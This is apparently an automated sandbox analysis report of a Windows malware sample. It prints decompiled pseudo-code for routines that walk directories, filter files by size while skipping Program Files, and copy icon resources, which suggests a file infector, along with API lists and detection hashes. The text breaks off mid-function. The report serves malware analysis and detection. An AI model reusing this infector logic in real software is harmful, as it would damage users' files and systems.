                                                                                                                          					E00403094(_t87);
                                                                                                                          					asm("popfd");
                                                                                                                          					if(_t39 + 1 != 0) {
                                                                                                                          						do {
                                                                                                                          							_t44 = E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4); // executed
                                                                                                                          							if(_t44 != 0) {
                                                                                                                          								asm("jecxz 0x16");
                                                                                                                          								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
                                                                                                                          								asm("jecxz 0x22");
                                                                                                                          								asm("loop 0x31");
                                                                                                                          								_push(E00402448(0x140));
                                                                                                                          								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
                                                                                                                          								_pop(_t80);
                                                                                                                          								_t69 = 0x140;
                                                                                                                          								E0040254C(_t87, _t69, _t80);
                                                                                                                          							}
                                                                                                                          							_t45 = FindNextFileA(_t84, _t87); // executed
                                                                                                                          						} while (_t45 != 0);
                                                                                                                          						FindClose(_t84); // executed
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t60 + 0x20)) = 0;
                                                                                                                          				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
                                                                                                                          			}



























                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                                                                          • Opcode Fuzzy Hash: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                          				void* _t14;
                                                                                                                          				CHAR* _t20;
                                                                                                                          				void* _t21;
                                                                                                                          				void* _t29;
                                                                                                                          				int _t30;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t60;
                                                                                                                          				void* _t62;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t67;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t68;
                                                                                                                          
                                                                                                                          				_t64 = __esi;
                                                                                                                          				_t41 = __ebx;
                                                                                                                          				_t14 = __eax -  *__eax;
                                                                                                                          				asm("popad");
                                                                                                                          				_t68 = _t67 + 0xfffffec0;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
                                                                                                                          				_pop(_t45);
                                                                                                                          				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
                                                                                                                          				E004044A8();
                                                                                                                          				_t20 = _t45;
                                                                                                                          				_push(_t20);
                                                                                                                          				_t21 = FindFirstFileA(_t20, _t68); // executed
                                                                                                                          				_t62 = _t21;
                                                                                                                          				asm("pushfd");
                                                                                                                          				E00403094(_t68);
                                                                                                                          				asm("popfd");
                                                                                                                          				if(_t21 + 1 != 0) {
                                                                                                                          					do {
                                                                                                                          						_t29 = E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))); // executed
                                                                                                                          						if(_t29 != 0) {
                                                                                                                          							asm("jecxz 0x16");
                                                                                                                          							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
                                                                                                                          							asm("jecxz 0x22");
                                                                                                                          							asm("loop 0x31");
                                                                                                                          							_push(E00402448(0x140));
                                                                                                                          							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
                                                                                                                          							_pop(_t60);
                                                                                                                          							_t51 = 0x140;
                                                                                                                          							E0040254C(_t68, _t51, _t60);
                                                                                                                          						}
                                                                                                                          						_t30 = FindNextFileA(_t62, _t68); // executed
                                                                                                                          					} while (_t30 != 0);
                                                                                                                          					FindClose(_t62); // executed
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                                                                                          				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
                                                                                                                          			}

















                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                                                                          • Opcode Fuzzy Hash: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F6C(CHAR* __eax) {
                                                                                                                          				intOrPtr _v288;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t4;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t8;
                                                                                                                          
                                                                                                                          				_t3 = FindFirstFileA(__eax, _t8); // executed
                                                                                                                          				_t4 = _t3 + 1;
                                                                                                                          				if(_t4 != 0) {
                                                                                                                          					FindClose(_t4 - 1); // executed
                                                                                                                          					return _v288;
                                                                                                                          				}
                                                                                                                          				return _t4;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                                                                          • Opcode Fuzzy Hash: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				short _v14;
                                                                                                                          				char _v17;
                                                                                                                          				signed int _v18;
                                                                                                                          				char _v19;
                                                                                                                          				int _v20;
                                                                                                                          				void** _v24;
                                                                                                                          				unsigned int _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				char _v33;
                                                                                                                          				int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				void* _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				signed short _v58;
                                                                                                                          				short _v60;
                                                                                                                          				short _v62;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				void* _v72;
                                                                                                                          				void** _v76;
                                                                                                                          				void** _v80;
                                                                                                                          				intOrPtr _v100;
                                                                                                                          				signed short _v106;
                                                                                                                          				short _v108;
                                                                                                                          				int _v112;
                                                                                                                          				int _v116;
                                                                                                                          				char _v120;
                                                                                                                          				short _v126;
                                                                                                                          				intOrPtr _v128;
                                                                                                                          				int _v136;
                                                                                                                          				int _v140;
                                                                                                                          				void _v144;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t138;
                                                                                                                          				signed int _t139;
                                                                                                                          				void* _t141;
                                                                                                                          				unsigned int _t152;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t162;
                                                                                                                          				void* _t179;
                                                                                                                          				void* _t181;
                                                                                                                          				void* _t199;
                                                                                                                          				void* _t201;
                                                                                                                          				void* _t207;
                                                                                                                          				void* _t212;
                                                                                                                          				void* _t214;
                                                                                                                          				signed int _t220;
                                                                                                                          				void* _t221;
                                                                                                                          				void* _t229;
                                                                                                                          				void* _t232;
                                                                                                                          				void* _t243;
                                                                                                                          				void* _t255;
                                                                                                                          				intOrPtr _t264;
                                                                                                                          				void* _t274;
                                                                                                                          				void* _t275;
                                                                                                                          				int _t293;
                                                                                                                          				int _t294;
                                                                                                                          				intOrPtr _t318;
                                                                                                                          				void* _t324;
                                                                                                                          				void* _t366;
                                                                                                                          				void* _t369;
                                                                                                                          				int _t375;
                                                                                                                          				int _t376;
                                                                                                                          				void* _t378;
                                                                                                                          				void* _t380;
                                                                                                                          				intOrPtr _t381;
                                                                                                                          
                                                                                                                          				_t378 = _t380;
                                                                                                                          				_t381 = _t380 + 0xffffff74;
                                                                                                                          				_v32 = __ecx;
                                                                                                                          				_v28 = __edx;
                                                                                                                          				_v24 = __eax;
                                                                                                                          				_v33 = 0;
                                                                                                                          				_v62 = 0;
                                                                                                                          				_v60 = 1;
                                                                                                                          				_t138 = _v28 + 1;
                                                                                                                          				_t139 = _t138 >> 1;
                                                                                                                          				if(_t138 < 0) {
                                                                                                                          					asm("adc eax, 0x0");
                                                                                                                          				}
                                                                                                                          				_v58 = _t139;
                                                                                                                          				_t141 = E0040598C(_v32);
                                                                                                                          				_t384 = _t141 - 6;
                                                                                                                          				if(_t141 != 6) {
                                                                                                                          					L59:
                                                                                                                          					return _v33;
                                                                                                                          				} else {
                                                                                                                          					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
                                                                                                                          					_v68 = E0040456C();
                                                                                                                          					_v52 = E00405FD8(0, 0, _t384);
                                                                                                                          					_v56 = E00405FD8(0, 0, _t384);
                                                                                                                          					_push(_t378);
                                                                                                                          					_push(0x406b11);
                                                                                                                          					_push( *[fs:ecx]);
                                                                                                                          					 *[fs:ecx] = _t381;
                                                                                                                          					_t152 = _v28 >> 1;
                                                                                                                          					if(_t152 < 0) {
                                                                                                                          						L22:
                                                                                                                          						_t154 = _v28 >> 1;
                                                                                                                          						__eflags = _t154;
                                                                                                                          						if(_t154 < 0) {
                                                                                                                          							L57:
                                                                                                                          							__eflags = 0;
                                                                                                                          							_pop(_t318);
                                                                                                                          							 *[fs:eax] = _t318;
                                                                                                                          							_push(E00406B18);
                                                                                                                          							E00404520(_v68);
                                                                                                                          							E00404520(_v52);
                                                                                                                          							return E00404520(_v56);
                                                                                                                          						} else {
                                                                                                                          							_t162 = _t154 + 1;
                                                                                                                          							__eflags = _t162;
                                                                                                                          							_v72 = _t162;
                                                                                                                          							_v40 = 0;
                                                                                                                          							_v80 = _v24;
                                                                                                                          							do {
                                                                                                                          								_t366 =  *_v80;
                                                                                                                          								_v48 = _v80[1];
                                                                                                                          								__eflags = _t366;
                                                                                                                          								if(_t366 != 0) {
                                                                                                                          									L26:
                                                                                                                          									GetObjectA(_v48, 0x18,  &_v144);
                                                                                                                          									_t293 = _v140;
                                                                                                                          									_t375 = _v136;
                                                                                                                          									E00402660( &_v120, 0x28);
                                                                                                                          									_v120 = 0x28;
                                                                                                                          									_v116 = _t293;
                                                                                                                          									_v112 = _t375;
                                                                                                                          									__eflags = _t366;
                                                                                                                          									if(_t366 != 0) {
                                                                                                                          										_t243 = _t293 + _t293;
                                                                                                                          										__eflags = _t243;
                                                                                                                          										_v112 = _t243;
                                                                                                                          									}
                                                                                                                          									_v108 = 1;
                                                                                                                          									_v18 = E0040465C(_v68, _v40);
                                                                                                                          									__eflags = _v14;
                                                                                                                          									if(_v14 == 0) {
                                                                                                                          										_v14 = E00406580(_v18 & 0x0000ffff);
                                                                                                                          									}
                                                                                                                          									_v106 = _v14;
                                                                                                                          									_push(E004065CC(_t293, _t375, _t378) + 0x28);
                                                                                                                          									_t179 = E00406624(_t293, _t375);
                                                                                                                          									_pop(_t324);
                                                                                                                          									_v100 = _t324 + _t179;
                                                                                                                          									_t181 = E0040598C(_v32);
                                                                                                                          									__eflags = _t181 - 0x28;
                                                                                                                          									if(_t181 == 0x28) {
                                                                                                                          										__eflags = _t366;
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                                                                          										} else {
                                                                                                                          											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											_t220 = _v106 & 0x0000ffff;
                                                                                                                          											__eflags = _t220 - 0x10;
                                                                                                                          											if(__eflags > 0) {
                                                                                                                          												_t221 = _t220 - 0x18;
                                                                                                                          												__eflags = _t221;
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													E00406218(_v52, 0x28, 6, _t378, __eflags);
                                                                                                                          												} else {
                                                                                                                          													__eflags = _t221 - 8;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														E00406218(_v52, 0x28, 7, _t378, __eflags);
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													E00406218(_v52, 0x28, 5, _t378, __eflags);
                                                                                                                          												} else {
                                                                                                                          													_t229 = _t220 - 1;
                                                                                                                          													__eflags = _t229;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                                                                          													} else {
                                                                                                                          														_t232 = _t229 - 3;
                                                                                                                          														__eflags = _t232;
                                                                                                                          														if(__eflags == 0) {
                                                                                                                          															E00406218(_v52, 0x28, 2, _t378, __eflags);
                                                                                                                          														} else {
                                                                                                                          															__eflags = _t232 - 4;
                                                                                                                          															if(__eflags == 0) {
                                                                                                                          																E00406218(_v52, 0x28, 3, _t378, __eflags);
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										__eflags =  *(_v52 + 0x41);
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											L54:
                                                                                                                          											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											E00406218(_v56, 0x28, 1, _t378, __eflags);
                                                                                                                          											E00406624(_t293, _t375);
                                                                                                                          											_t199 = E0040598C(_v32);
                                                                                                                          											_t201 = E00406624(_t293, _t375);
                                                                                                                          											__eflags = _t199 - _t201;
                                                                                                                          											if(_t199 == _t201) {
                                                                                                                          												goto L56;
                                                                                                                          											} else {
                                                                                                                          												E00402BEC();
                                                                                                                          												goto L59;
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											_t207 = E0040598C(_v32);
                                                                                                                          											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
                                                                                                                          											if(_t207 == (_v18 & 0x0000ffff) << 2) {
                                                                                                                          												E004065CC(_t293, _t375, _t378);
                                                                                                                          												_t212 = E0040598C(_v32);
                                                                                                                          												_t214 = E004065CC(_t293, _t375, _t378);
                                                                                                                          												_pop(0x28);
                                                                                                                          												__eflags = _t212 - _t214;
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													goto L54;
                                                                                                                          												} else {
                                                                                                                          													E00402BEC();
                                                                                                                          													goto L59;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												E00402BEC();
                                                                                                                          												goto L59;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										E00402BEC();
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _v48;
                                                                                                                          									if(_v48 == 0) {
                                                                                                                          										goto L57;
                                                                                                                          									} else {
                                                                                                                          										goto L26;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L60;
                                                                                                                          								L56:
                                                                                                                          								_v40 = _v40 + 1;
                                                                                                                          								_v80 =  &(_v80[2]);
                                                                                                                          								_t130 =  &_v72;
                                                                                                                          								 *_t130 = _v72 - 1;
                                                                                                                          								__eflags =  *_t130;
                                                                                                                          							} while ( *_t130 != 0);
                                                                                                                          							goto L57;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_v72 = _t152 + 1;
                                                                                                                          						_v76 = _v24;
                                                                                                                          						while(1) {
                                                                                                                          							_t369 =  *_v76;
                                                                                                                          							_v48 = _v76[1];
                                                                                                                          							if(_t369 == 0 && _v48 == 0) {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							GetObjectA(_v48, 0x18,  &_v144);
                                                                                                                          							_t294 = _v140;
                                                                                                                          							_t376 = _v136;
                                                                                                                          							if(_t369 != 0) {
                                                                                                                          								GetObjectA(_t369, 0x18,  &_v144);
                                                                                                                          							}
                                                                                                                          							E00402660( &_v20, 0x10);
                                                                                                                          							_v20 = _t294;
                                                                                                                          							_v19 = _t376;
                                                                                                                          							if(_t369 != 0) {
                                                                                                                          								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
                                                                                                                          								E004061E0(_v52, _t255, __eflags);
                                                                                                                          								E00402660( &_v120, 0x28);
                                                                                                                          								_v120 = 0x28;
                                                                                                                          								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
                                                                                                                          								_t264 = _v128;
                                                                                                                          								__eflags = _t264 - 1;
                                                                                                                          								if(_t264 != 1) {
                                                                                                                          									L14:
                                                                                                                          									_t310 = _v126;
                                                                                                                          									__eflags = 1 - 0x10;
                                                                                                                          									if(1 >= 0x10) {
                                                                                                                          										__eflags = 1 - 0x100;
                                                                                                                          										if(1 >= 0x100) {
                                                                                                                          											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
                                                                                                                          											_v18 = 0;
                                                                                                                          											_v17 = 1;
                                                                                                                          										} else {
                                                                                                                          											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
                                                                                                                          											_v18 = 0x10;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
                                                                                                                          										_v18 = 2;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _v126 - 0xf;
                                                                                                                          									if(_v126 < 0xf) {
                                                                                                                          										goto L14;
                                                                                                                          									} else {
                                                                                                                          										_v18 = 0;
                                                                                                                          										_v17 = 0;
                                                                                                                          										_v14 = _v126;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_v18 = 2;
                                                                                                                          							}
                                                                                                                          							E004045E8(_v68, 0xbadbad);
                                                                                                                          							_t274 = E004065CC(_t294, _t376, _t378);
                                                                                                                          							_t275 = E00406598(_t378);
                                                                                                                          							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
                                                                                                                          							_v8 = _v44;
                                                                                                                          							if(E0040598C(_v32) == 0x10) {
                                                                                                                          								_v44 = _v44 + _v12;
                                                                                                                          								_v76 =  &(_v76[2]);
                                                                                                                          								_t66 =  &_v72;
                                                                                                                          								 *_t66 = _v72 - 1;
                                                                                                                          								__eflags =  *_t66;
                                                                                                                          								if( *_t66 != 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								E00402BEC();
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          							goto L60;
                                                                                                                          						}
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L60:
                                                                                                                          			}

                                                                                                                          0x00406713
                                                                                                                          0x0040671f
                                                                                                                          0x0040671f
                                                                                                                          0x0040672e
                                                                                                                          0x00406733
                                                                                                                          0x00406738
                                                                                                                          0x0040673d
                                                                                                                          0x00406752
                                                                                                                          0x0040675c
                                                                                                                          0x0040676b
                                                                                                                          0x00406770
                                                                                                                          0x00406789
                                                                                                                          0x0040678e
                                                                                                                          0x00406792
                                                                                                                          0x00406796
                                                                                                                          0x004067b1
                                                                                                                          0x004067b1
                                                                                                                          0x004067c2
                                                                                                                          0x004067c5
                                                                                                                          0x004067d7
                                                                                                                          0x004067dd
                                                                                                                          0x004067f4
                                                                                                                          0x004067f9
                                                                                                                          0x004067fd
                                                                                                                          0x004067df
                                                                                                                          0x004067e4
                                                                                                                          0x004067e9
                                                                                                                          0x004067e9
                                                                                                                          0x004067c7
                                                                                                                          0x004067cc
                                                                                                                          0x004067d1
                                                                                                                          0x004067d1
                                                                                                                          0x00406798
                                                                                                                          0x00406798
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679f
                                                                                                                          0x0040679f
                                                                                                                          0x004067a3
                                                                                                                          0x004067ab
                                                                                                                          0x004067ab
                                                                                                                          0x0040679d
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x00406813
                                                                                                                          0x0040681d
                                                                                                                          0x00406826
                                                                                                                          0x0040683c
                                                                                                                          0x00406842
                                                                                                                          0x00406858
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x00406858
                                                                                                                          0x00000000
                                                                                                                          0x004066d7
                                                                                                                          0x004066c7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                                                                          • CopyImage.USER32 ref: 00406977
                                                                                                                          • CopyImage.USER32 ref: 004069FE
                                                                                                                          • CopyImage.USER32 ref: 00406752
                                                                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                                                                            • Part of subcall function 00406154: 73BBAC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                                                                            • Part of subcall function 00406154: 73BBA7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                                                                            • Part of subcall function 00406154: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                                                                          • CopyImage.USER32 ref: 00406A93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v9;
                                                                                                                          				char _v16;
                                                                                                                          				char _v40254;
                                                                                                                          				char _v41487;
                                                                                                                          				char _v41488;
                                                                                                                          				char _v41492;
                                                                                                                          				char _v41496;
                                                                                                                          				char _v41500;
                                                                                                                          				char _v41504;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t80;
                                                                                                                          				void* _t82;
                                                                                                                          				long _t85;
                                                                                                                          				CHAR* _t130;
                                                                                                                          				intOrPtr _t150;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t155;
                                                                                                                          				long _t173;
                                                                                                                          				void* _t177;
                                                                                                                          				void* _t178;
                                                                                                                          
                                                                                                                          				_t128 = __ebx;
                                                                                                                          				_t177 = _t178;
                                                                                                                          				_push(__eax);
                                                                                                                          				_t45 = 0xa;
                                                                                                                          				goto L1;
                                                                                                                          				L17:
                                                                                                                          				_pop(_t150);
                                                                                                                          				 *[fs:eax] = _t150;
                                                                                                                          				_push(E00407493);
                                                                                                                          				E004030B8( &_v41504, 4);
                                                                                                                          				return E00403094( &_v8);
                                                                                                                          				L1:
                                                                                                                          				_t178 = _t178 + 0xfffff004;
                                                                                                                          				_push(_t45);
                                                                                                                          				_t45 = _t45 - 1;
                                                                                                                          				_t180 = _t45;
                                                                                                                          				if(_t45 != 0) {
                                                                                                                          					goto L1;
                                                                                                                          				} else {
                                                                                                                          					_push(__ebx);
                                                                                                                          					_v41504 = 0;
                                                                                                                          					_v41500 = 0;
                                                                                                                          					_v41496 = 0;
                                                                                                                          					_v41492 = 0;
                                                                                                                          					E004033FC(_v8);
                                                                                                                          					_push(_t177);
                                                                                                                          					_push(0x40748c);
                                                                                                                          					_push( *[fs:eax]);
                                                                                                                          					 *[fs:eax] = _t178 + 0xfffffde8;
                                                                                                                          					_v9 = 0;
                                                                                                                          					E004031F4( &_v41492, 3, 0x4091c0);
                                                                                                                          					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
                                                                                                                          						E00404F34(_v8,  &_v41496);
                                                                                                                          						E0040312C( &_v8, _v41496);
                                                                                                                          						E00404F90( &_v41500, _t128, 3);
                                                                                                                          						_push(E0040340C(_v41500));
                                                                                                                          						_t129 = E0040340C(_v8);
                                                                                                                          						_pop(_t154);
                                                                                                                          						if(E00404B38(_t68, _t154) == 0) {
                                                                                                                          							E00405008( &_v41504, _t129, 3);
                                                                                                                          							_t155 = E0040340C(_v41504);
                                                                                                                          							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
                                                                                                                          								_t80 = E00404F6C(_v8);
                                                                                                                          								if(_t80 > 0xa200 && _t80 <= 0x989680) {
                                                                                                                          									_t82 = E00407130(_v8, _t129); // executed
                                                                                                                          									if(_t82 == 0) {
